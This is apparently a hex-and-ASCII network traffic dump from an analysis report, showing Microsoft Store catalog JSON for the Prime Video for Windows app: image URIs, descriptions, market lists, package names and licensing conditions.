2c 22 55 6e
                                                                                                                                                                                    Data Ascii: 0-4baf-4a2a-aa3a-9088b29adc54","Width":310},{"FileId":"3020959478735342516","EISListingIdentifier":null,"BackgroundColor":"transparent","Caption":"","FileSizeInBytes":86159,"ForegroundColor":"","Height":225,"ImagePositionInfo":"","ImagePurpose":"Tile","Un
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15184INData Raw: 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 39 38 34 36 32 39 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 31 30 38 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 53 75 70 65 72 48 65 72 6f 41 72 74 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 6e 54 38 4d 4d 4a 52 75 4a 35 59 7a 6d 74 66 6b 47 64 74 54 58 72 48 6f 62 4c 33 68 2b 59 75 4f 50 79 6f 67 4d 77 48 33 65 72 63 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 31 36 32 38 35 2e 31 34 36 31 38 39 38 35 35 33 36 39 31 39
                                                                                                                                                                                    Data Ascii: FileSizeInBytes":1984629,"ForegroundColor":"","Height":1080,"ImagePositionInfo":"","ImagePurpose":"SuperHeroArt","UnscaledImageSHA256Hash":"nT8MMJRuJ5YzmtfkGdtTXrHobL3h+YuOPyogMwH3erc=","Uri":"//store-images.s-microsoft.com/image/apps.16285.14618985536919
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15185INData Raw: 6e 73 68 6f 74 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 50 70 74 6f 62 2b 55 46 51 41 50 61 73 54 37 75 47 76 6c 64 4e 71 34 42 35 76 67 70 72 63 51 4e 4a 32 36 57 63 78 70 6d 37 4d 41 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 33 39 37 34 32 2e 31 34 36 31 38 39 38 35 35 33 36 39 31 39 39 30 35 2e 38 64 62 61 30 35 65 61 2d 38 64 39 39 2d 34 65 63 36 2d 39 62 61 38 2d 61 39 33 63 65 38 33 36 63 63 61 63 2e 66 64 30 65 31 37 65 66 2d 65 32 34 35 2d 34 32 38 39 2d 38 36 30 30 2d 30 32 66 61 39 65 31 64 39 63 37 38 22 2c 22 57 69 64 74 68 22 3a 31 33 36 36 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 32 30
                                                                                                                                                                                    Data Ascii: nshot","UnscaledImageSHA256Hash":"Pptob+UFQAPasT7uGvldNq4B5vgprcQNJ26Wcxpm7MA=","Uri":"//store-images.s-microsoft.com/image/apps.39742.14618985536919905.8dba05ea-8d99-4ec6-9ba8-a93ce836ccac.fd0e17ef-e245-4289-8600-02fa9e1d9c78","Width":1366},{"FileId":"20
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15186INData Raw: 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 34 33 37 30 34 2e 31 34 36 31 38 39 38 35 35 33 36 39 31 39 39 30 35 2e 38 64 62 61 30 35 65 61 2d 38 64 39 39 2d 34 65 63 36 2d 39 62 61 38 2d 61 39 33 63 65 38 33 36 63 63 61 63 2e 36 34 61 31 37 35 34 37 2d 33 33 35 66 2d 34 64 66 38 2d 39 34 65 62 2d 38 66 36 30 66 36 33 32 39 32 34 38 22 2c 22 57 69 64 74 68 22 3a 31 33 36 36 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 32 30 30 30 30 30 30 30 30 30 30 36 37 38 30 31 37 30 33 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79
                                                                                                                                                                                    Data Ascii: icrosoft.com/image/apps.43704.14618985536919905.8dba05ea-8d99-4ec6-9ba8-a93ce836ccac.64a17547-335f-4df8-94eb-8f60f6329248","Width":1366},{"FileId":"2000000000067801703","EISListingIdentifier":null,"BackgroundColor":"transparent","Caption":"","FileSizeInBy
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15187INData Raw: 66 63 38 2d 36 37 36 63 31 30 61 63 32 30 32 33 22 2c 22 57 69 64 74 68 22 3a 31 33 36 36 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 32 30 30 30 30 30 30 30 30 30 30 36 37 38 30 31 37 30 38 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 31 37 30 36 30 31 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 37 36 38 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 44 65 73 6b 74 6f 70 2f 36 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 53 63 72 65 65 6e 73 68 6f 74
                                                                                                                                                                                    Data Ascii: fc8-676c10ac2023","Width":1366},{"FileId":"2000000000067801708","EISListingIdentifier":null,"BackgroundColor":"transparent","Caption":"","FileSizeInBytes":1170601,"ForegroundColor":"","Height":768,"ImagePositionInfo":"Desktop/6","ImagePurpose":"Screenshot
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15188INData Raw: 2e 6e 65 74 2f 61 38 35 32 32 64 61 61 2d 30 33 36 38 2d 34 64 66 62 2d 38 63 37 61 2d 35 39 62 35 39 65 33 30 62 61 30 64 2f 35 61 62 31 37 32 31 61 2d 35 38 63 35 2d 34 63 66 35 2d 38 37 34 35 2d 33 61 63 62 39 63 31 63 2e 69 73 6d 2f 6d 61 6e 69 66 65 73 74 22 2c 22 56 69 64 65 6f 50 75 72 70 6f 73 65 22 3a 22 48 65 72 6f 54 72 61 69 6c 65 72 22 2c 22 48 65 69 67 68 74 22 3a 31 30 38 30 2c 22 57 69 64 74 68 22 3a 31 39 32 30 2c 22 41 75 64 69 6f 45 6e 63 6f 64 69 6e 67 22 3a 22 22 2c 22 56 69 64 65 6f 45 6e 63 6f 64 69 6e 67 22 3a 22 61 70 63 68 22 2c 22 56 69 64 65 6f 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 56 69 64 65 6f 2f 30 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 50 72 69 6d 65 20 56 69 64 65 6f 20 66 6f 72 20 57 69 6e 64 6f 77 73 22 2c 22 46
                                                                                                                                                                                    Data Ascii: .net/a8522daa-0368-4dfb-8c7a-59b59e30ba0d/5ab1721a-58c5-4cf5-8745-3acb9c1c.ism/manifest","VideoPurpose":"HeroTrailer","Height":1080,"Width":1920,"AudioEncoding":"","VideoEncoding":"apch","VideoPositionInfo":"Video/0","Caption":"Prime Video for Windows","F
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15189INData Raw: 66 66 6c 69 6e 65 20 2d 20 61 6e 79 77 68 65 72 65 2c 20 61 6e 79 74 69 6d 65 2e 5c 72 5c 6e 2d 20 52 65 6e 74 20 6f 72 20 62 75 79 20 74 68 6f 75 73 61 6e 64 73 20 6f 66 20 74 69 74 6c 65 73 20 69 6e 63 6c 75 64 69 6e 67 20 6e 65 77 20 72 65 6c 65 61 73 65 20 6d 6f 76 69 65 73 2c 20 70 6f 70 75 6c 61 72 20 54 56 20 73 68 6f 77 73 2c 20 61 6e 64 20 6d 6f 72 65 20 28 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 69 6e 20 61 6c 6c 20 63 6f 75 6e 74 72 69 65 73 2f 72 65 67 69 6f 6e 73 29 2e 5c 72 5c 6e 2d 20 57 69 74 68 20 50 72 69 6d 65 20 56 69 64 65 6f 20 43 68 61 6e 6e 65 6c 73 2c 20 50 72 69 6d 65 20 6d 65 6d 62 65 72 73 20 63 61 6e 20 73 75 62 73 63 72 69 62 65 20 74 6f 20 6d 6f 72 65 20 74 68 61 6e 20 31 35 30 20 70 72 65 6d 69 75 6d 20 61 6e 64 20 73 70
                                                                                                                                                                                    Data Ascii: ffline - anywhere, anytime.\r\n- Rent or buy thousands of titles including new release movies, popular TV shows, and more (not available in all countries/regions).\r\n- With Prime Video Channels, Prime members can subscribe to more than 150 premium and sp
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15190INData Raw: 61 72 63 68 48 69 6e 74 22 7d 2c 7b 22 53 65 61 72 63 68 54 69 74 6c 65 53 74 72 69 6e 67 22 3a 22 48 42 4f 22 2c 22 53 65 61 72 63 68 54 69 74 6c 65 54 79 70 65 22 3a 22 53 65 61 72 63 68 48 69 6e 74 22 7d 5d 2c 22 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 75 73 22 2c 22 4d 61 72 6b 65 74 73 22 3a 5b 22 55 53 22 2c 22 44 5a 22 2c 22 41 52 22 2c 22 41 55 22 2c 22 41 54 22 2c 22 42 48 22 2c 22 42 44 22 2c 22 42 45 22 2c 22 42 52 22 2c 22 42 47 22 2c 22 43 41 22 2c 22 43 4c 22 2c 22 43 4e 22 2c 22 43 4f 22 2c 22 43 52 22 2c 22 48 52 22 2c 22 43 59 22 2c 22 43 5a 22 2c 22 44 4b 22 2c 22 45 47 22 2c 22 45 45 22 2c 22 46 49 22 2c 22 46 52 22 2c 22 44 45 22 2c 22 47 52 22 2c 22 47 54 22 2c 22 48 4b 22 2c 22 48 55 22 2c 22 49 53 22 2c 22 49 4e 22 2c 22 49 44 22
                                                                                                                                                                                    Data Ascii: archHint"},{"SearchTitleString":"HBO","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID"
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15191INData Raw: 22 2c 22 4d 56 22 2c 22 4d 4c 22 2c 22 4e 43 22 2c 22 4e 49 22 2c 22 4e 45 22 2c 22 4e 55 22 2c 22 4e 46 22 2c 22 50 57 22 2c 22 50 53 22 2c 22 50 41 22 2c 22 50 47 22 2c 22 50 59 22 2c 22 52 45 22 2c 22 52 57 22 2c 22 42 4c 22 2c 22 4d 46 22 2c 22 57 53 22 2c 22 53 54 22 2c 22 53 4e 22 2c 22 4d 50 22 2c 22 50 4e 22 2c 22 53 58 22 2c 22 53 42 22 2c 22 53 4f 22 2c 22 53 43 22 2c 22 53 4c 22 2c 22 47 53 22 2c 22 53 48 22 2c 22 4b 4e 22 2c 22 4c 43 22 2c 22 50 4d 22 2c 22 56 43 22 2c 22 54 4a 22 2c 22 54 5a 22 2c 22 54 47 22 2c 22 54 4b 22 2c 22 54 4f 22 2c 22 54 4d 22 2c 22 54 43 22 2c 22 54 56 22 2c 22 55 4d 22 2c 22 55 47 22 2c 22 56 49 22 2c 22 56 47 22 2c 22 57 46 22 2c 22 45 48 22 2c 22 5a 4d 22 2c 22 5a 57 22 2c 22 55 5a 22 2c 22 56 55 22 2c 22 53 52
                                                                                                                                                                                    Data Ascii: ","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15192INData Raw: 22 50 72 65 66 65 72 72 65 64 53 6b 75 49 64 22 3a 22 30 30 31 30 22 2c 22 50 72 6f 64 75 63 74 54 79 70 65 22 3a 22 41 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 56 61 6c 69 64 61 74 69 6f 6e 44 61 74 61 22 3a 7b 22 50 61 73 73 65 64 56 61 6c 69 64 61 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 52 65 76 69 73 69 6f 6e 49 64 22 3a 22 32 30 32 32 2d 31 32 2d 31 34 54 31 36 3a 33 31 3a 34 36 2e 38 35 30 31 37 31 34 5a 7c 7c 2e 7c 7c 65 38 36 33 34 65 66 39 2d 38 39 32 30 2d 34 63 36 31 2d 38 32 64 37 2d 64 64 62 66 35 36 61 64 66 66 63 36 7c 7c 31 31 35 32 39 32 31 35 30 35 36 39 35 36 37 39 32 34 30 7c 7c 4e 75 6c 6c 7c 7c 66 75 6c 6c 72 65 6c 65 61 73 65 22 2c 22 56 61 6c 69 64 61 74 69 6f 6e 52 65 73 75 6c 74 55 72 69 22 3a 22 22 7d 2c 22 4d 65 72 63 68 61 6e 64
                                                                                                                                                                                    Data Ascii: "PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-12-14T16:31:46.8501714Z||.||e8634ef9-8920-4c61-82d7-ddbf56adffc6||1152921505695679240||Null||fullrelease","ValidationResultUri":""},"Merchand
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15193INData Raw: 64 2c 20 63 61 6e 63 65 6c 20 61 6e 79 74 69 6d 65 20 28 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 69 6e 20 61 6c 6c 20 63 6f 75 6e 74 72 69 65 73 2f 72 65 67 69 6f 6e 73 29 2e 5c 72 5c 6e 2d 20 57 69 74 68 20 58 2d 52 61 79 2c 20 76 69 65 77 20 49 4d 44 62 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 65 20 61 63 74 6f 72 73 2c 20 73 6f 6e 67 73 2c 20 61 6e 64 20 74 72 69 76 69 61 20 66 6f 72 20 76 69 64 65 6f 73 20 61 73 20 79 6f 75 20 73 74 72 65 61 6d 2e 5c 72 5c 6e 5c 72 5c 6e 53 65 65 20 77 77 77 2e 70 72 69 6d 65 76 69 64 65 6f 2e 63 6f 6d 2f 77 77 2d 61 76 2d 6c 65 67 61 6c 2d 68 6f 6d 65 20 66 6f 72 20 74 68 65 20 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 20 61 6e 64 20 6f 74 68 65 72 20 74 65 72 6d 73 20 61 70 70 6c 69 63 61 62
                                                                                                                                                                                    Data Ascii: d, cancel anytime (not available in all countries/regions).\r\n- With X-Ray, view IMDb information about the actors, songs, and trivia for videos as you stream.\r\n\r\nSee www.primevideo.com/ww-av-legal-home for the Privacy Policy and other terms applicab
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15194INData Raw: 22 47 50 22 2c 22 47 55 22 2c 22 47 47 22 2c 22 47 4e 22 2c 22 47 57 22 2c 22 47 59 22 2c 22 48 54 22 2c 22 48 4d 22 2c 22 48 4e 22 2c 22 41 5a 22 2c 22 42 53 22 2c 22 42 42 22 2c 22 42 59 22 2c 22 42 5a 22 2c 22 42 4a 22 2c 22 42 4d 22 2c 22 42 54 22 2c 22 4b 4d 22 2c 22 43 47 22 2c 22 43 44 22 2c 22 43 4b 22 2c 22 43 58 22 2c 22 43 43 22 2c 22 43 49 22 2c 22 43 57 22 2c 22 4a 4d 22 2c 22 53 4a 22 2c 22 4a 45 22 2c 22 4b 49 22 2c 22 4b 47 22 2c 22 4c 41 22 2c 22 4c 53 22 2c 22 4c 52 22 2c 22 4d 4f 22 2c 22 4d 4b 22 2c 22 4d 47 22 2c 22 4d 57 22 2c 22 49 4d 22 2c 22 4d 48 22 2c 22 4d 51 22 2c 22 4d 55 22 2c 22 59 54 22 2c 22 46 4d 22 2c 22 4d 44 22 2c 22 4d 4e 22 2c 22 4d 53 22 2c 22 4d 5a 22 2c 22 4d 4d 22 2c 22 4e 41 22 2c 22 4e 52 22 2c 22 4e 50 22 2c
                                                                                                                                                                                    Data Ascii: "GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP",
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15195INData Raw: 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 33 39 31 39 30 35 32 38 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 4d 73 69 78 42 75 6e 64 6c 65 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 41 6d 61 7a 6f 6e 56 69 64 65 6f 2e 50 72 69 6d 65 56 69 64 65 6f 5f 70 77 62 6a 39 76 76 65 63 6a 68 37 6a 22 2c 22 4d 61 69 6e 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 46 6f 72 44 6c 63 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 75 6c 6c 4e 61 6d 65 22 3a 22 41 6d 61 7a 6f 6e 56 69 64 65 6f 2e 50 72 69 6d 65 56 69 64 65 6f 5f 31 2e 30 2e 31 32 30 2e 30 5f 6e 65 75 74 72 61 6c 5f 7e 5f 70 77 62 6a 39 76 76 65 63 6a 68 37 6a 22 2c 22 50 61 63 6b 61 67 65 49 64 22 3a 22 39 36 61 36 38 66 35 34
                                                                                                                                                                                    Data Ascii: ,"MaxInstallSizeInBytes":39190528,"PackageFormat":"MsixBundle","PackageFamilyName":"AmazonVideo.PrimeVideo_pwbj9vvecjh7j","MainPackageFamilyNameForDlc":null,"PackageFullName":"AmazonVideo.PrimeVideo_1.0.120.0_neutral_~_pwbj9vvecjh7j","PackageId":"96a68f54
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15196INData Raw: 65 5c 22 3a 37 2c 5c 22 70 6f 6c 69 63 79 5c 22 3a 7b 5c 22 63 61 74 65 67 6f 72 79 2e 66 69 72 73 74 5c 22 3a 5c 22 61 70 70 5c 22 2c 5c 22 63 61 74 65 67 6f 72 79 2e 73 65 63 6f 6e 64 5c 22 3a 5c 22 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 22 2c 5c 22 6f 70 74 4f 75 74 2e 62 61 63 6b 75 70 52 65 73 74 6f 72 65 5c 22 3a 74 72 75 65 2c 5c 22 6f 70 74 4f 75 74 2e 72 65 6d 6f 76 65 61 62 6c 65 4d 65 64 69 61 5c 22 3a 66 61 6c 73 65 7d 2c 5c 22 70 6f 6c 69 63 79 32 5c 22 3a 7b 5c 22 61 67 65 52 61 74 69 6e 67 5c 22 3a 33 2c 5c 22 6f 70 74 4f 75 74 2e 44 56 52 5c 22 3a 74 72 75 65 2c 5c 22 74 68 69 72 64 50 61 72 74 79 41 70 70 52 61 74 69 6e 67 73 5c 22 3a 5b 7b 5c 22 6c 65 76 65 6c 5c 22 3a 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 33 7d 2c 7b 5c 22 6c
                                                                                                                                                                                    Data Ascii: e\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Entertainment\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":true,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"l
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15197INData Raw: 79 42 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 49 64 22 3a 22 39 51 4e 37 56 53 30 33 35 30 38 37 22 2c 22 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 43 6c 69 65 6e 74 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 41 6c 6c 6f 77 65 64 50 6c 61 74 66 6f 72 6d 73 22 3a 5b 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69
                                                                                                                                                                                    Data Ascii: yBSchema":"AvailabilityUnifiedApp;3","AvailabilityId":"9QN7VS035087","Conditions":{"ClientConditions":{"AllowedPlatforms":[{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Desktop"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Wi
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15198INData Raw: 6c 6c 6f 77 65 64 50 6c 61 74 66 6f 72 6d 73 22 3a 5b 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 38 38 32 38 30 38 30 22 7d 5d 7d 2c 22 45 6e 64 44 61 74 65 22 3a 22 39 39 39 38 2d 31 32 2d 33 30 54 30 30 3a 30 30 3a 30 30 2e 30 30 30 30 30 30 30 5a 22 2c 22 52 65 73 6f 75 72 63 65 53 65 74 49 64 73 22 3a 5b 22 31 22 5d 2c 22 53 74 61 72 74 44 61 74 65 22 3a 22 31 37 35 33 2d 30 31 2d 30 31
                                                                                                                                                                                    Data Ascii: llowedPlatforms":[{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Desktop"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.8828080"}]},"EndDate":"9998-12-30T00:00:00.0000000Z","ResourceSetIds":["1"],"StartDate":"1753-01-01
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15199INData Raw: 69 6f 6e 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 7d 2c 7b 22 41 63 74 69 6f 6e 73 22 3a 5b 22 4c 69 63 65 6e 73 65 22 2c 22 44 65 74 61 69 6c 73 22 5d 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 41 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 42 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 49 64 22 3a 22 39 58 54 4c 32 33 34 46 4c 33 39 52 22 2c 22 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 43 6c 69 65 6e 74 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 41 6c 6c 6f 77 65 64 50 6c 61 74 66 6f 72 6d 73 22 3a 5b 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69
                                                                                                                                                                                    Data Ascii: ionRequired":false},{"Actions":["License","Details"],"AvailabilityASchema":"Availability;3","AvailabilityBSchema":"AvailabilityUnifiedApp;3","AvailabilityId":"9XTL234FL39R","Conditions":{"ClientConditions":{"AllowedPlatforms":[{"MaxVersion":2147483647,"Mi
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15200INData Raw: 63 34 38 35 30 38 3a 46 75 6c 6c 22 5d 2c 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 2c 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 62 69 67 3a 39 50 36 52 43 37 36 4d 53 4d 4d 4a 3a 30 30 30 31 22 5d 2c 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 2c 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 62 69 67 3a 39 50 36 52 43 37 36 4d 53 4d 4d 4a 3a 30 30 30 32 22 5d 2c 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 5d 7d 2c 22 4d 61 72 6b 65 74 73 22 3a 5b 22 55 53 22 5d 2c 22 4f 72 64 65 72 4d 61 6e 61 67 65 6d 65 6e 74 44 61 74 61 22 3a 7b 22 47 72 61 6e 74 65 64 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 5d 2c 22 50 72 69 63 65
                                                                                                                                                                                    Data Ascii: c48508:Full"],"LicensingKeyIds":["1"]},{"EntitlementKeys":["big:9P6RC76MSMMJ:0001"],"LicensingKeyIds":["1"]},{"EntitlementKeys":["big:9P6RC76MSMMJ:0002"],"LicensingKeyIds":["1"]}]},"Markets":["US"],"OrderManagementData":{"GrantedEntitlementKeys":[],"Price
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15201INData Raw: 20 6c 69 6b 65 20 53 48 4f 57 54 49 4d 45 2c 20 53 54 41 52 5a 2c 20 61 6e 64 20 43 69 6e 65 6d 61 78 2e 20 4f 6e 6c 79 20 70 61 79 20 66 6f 72 20 74 68 65 20 63 68 61 6e 6e 65 6c 73 20 79 6f 75 20 77 61 6e 74 2c 20 6e 6f 20 63 61 62 6c 65 20 72 65 71 75 69 72 65 64 2c 20 63 61 6e 63 65 6c 20 61 6e 79 74 69 6d 65 20 28 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 69 6e 20 61 6c 6c 20 63 6f 75 6e 74 72 69 65 73 2f 72 65 67 69 6f 6e 73 29 2e 5c 72 5c 6e 2d 20 57 69 74 68 20 58 2d 52 61 79 2c 20 76 69 65 77 20 49 4d 44 62 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 65 20 61 63 74 6f 72 73 2c 20 73 6f 6e 67 73 2c 20 61 6e 64 20 74 72 69 76 69 61 20 66 6f 72 20 76 69 64 65 6f 73 20 61 73 20 79 6f 75 20 73 74 72 65 61 6d 2e 5c 72 5c 6e 5c 72 5c
                                                                                                                                                                                    Data Ascii: like SHOWTIME, STARZ, and Cinemax. Only pay for the channels you want, no cable required, cancel anytime (not available in all countries/regions).\r\n- With X-Ray, view IMDb information about the actors, songs, and trivia for videos as you stream.\r\n\r\
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15202INData Raw: 43 22 2c 22 53 56 22 2c 22 47 51 22 2c 22 45 52 22 2c 22 45 54 22 2c 22 46 4b 22 2c 22 46 4f 22 2c 22 46 4a 22 2c 22 47 46 22 2c 22 50 46 22 2c 22 54 46 22 2c 22 47 41 22 2c 22 47 4d 22 2c 22 47 45 22 2c 22 47 48 22 2c 22 47 49 22 2c 22 47 4c 22 2c 22 47 44 22 2c 22 47 50 22 2c 22 47 55 22 2c 22 47 47 22 2c 22 47 4e 22 2c 22 47 57 22 2c 22 47 59 22 2c 22 48 54 22 2c 22 48 4d 22 2c 22 48 4e 22 2c 22 41 5a 22 2c 22 42 53 22 2c 22 42 42 22 2c 22 42 59 22 2c 22 42 5a 22 2c 22 42 4a 22 2c 22 42 4d 22 2c 22 42 54 22 2c 22 4b 4d 22 2c 22 43 47 22 2c 22 43 44 22 2c 22 43 4b 22 2c 22 43 58 22 2c 22 43 43 22 2c 22 43 49 22 2c 22 43 57 22 2c 22 4a 4d 22 2c 22 53 4a 22 2c 22 4a 45 22 2c 22 4b 49 22 2c 22 4b 47 22 2c 22 4c 41 22 2c 22 4c 53 22 2c 22 4c 52 22 2c 22 4d
                                                                                                                                                                                    Data Ascii: C","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","M
